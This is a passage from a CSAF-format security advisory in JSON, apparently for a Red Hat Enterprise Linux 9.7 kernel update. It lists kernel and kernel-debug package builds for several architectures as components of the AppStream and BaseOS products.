"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.src",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 9)",
"product_id": "BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "BaseOS-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
